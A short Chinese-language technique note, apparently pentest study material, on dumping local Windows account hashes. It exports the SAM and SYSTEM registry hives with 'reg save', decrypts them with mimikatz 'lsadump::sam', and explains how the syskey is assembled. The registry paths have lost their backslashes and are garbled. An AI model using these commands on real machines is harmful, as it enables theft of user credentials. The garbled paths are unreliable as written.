方式1:通过SAM数据库获得本地用户HASH
sam文件:是用来存储本地用户账号密码的文件的数据库
system文件:里面有对sam文件进行加密和加密的密钥
利用方式:
导出sam和system:
reg save hklmsam sam.hiv
reg save hklmsystem system.hiv
解密工具mimikatz:
lsadump::sam /sam:sam.hiv /system:system.hiv
原理:
1、读取HKLMSYSTEM,获得syskey:
syskey的由来: 读取注册表项HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa下的键值JD、Skew1、GBG和Data中的内容,拼接成syskey
syskey的作用: Syskey中的加密的是账号数据库,也就是位于%SystemRoot%system32config的SAM文件
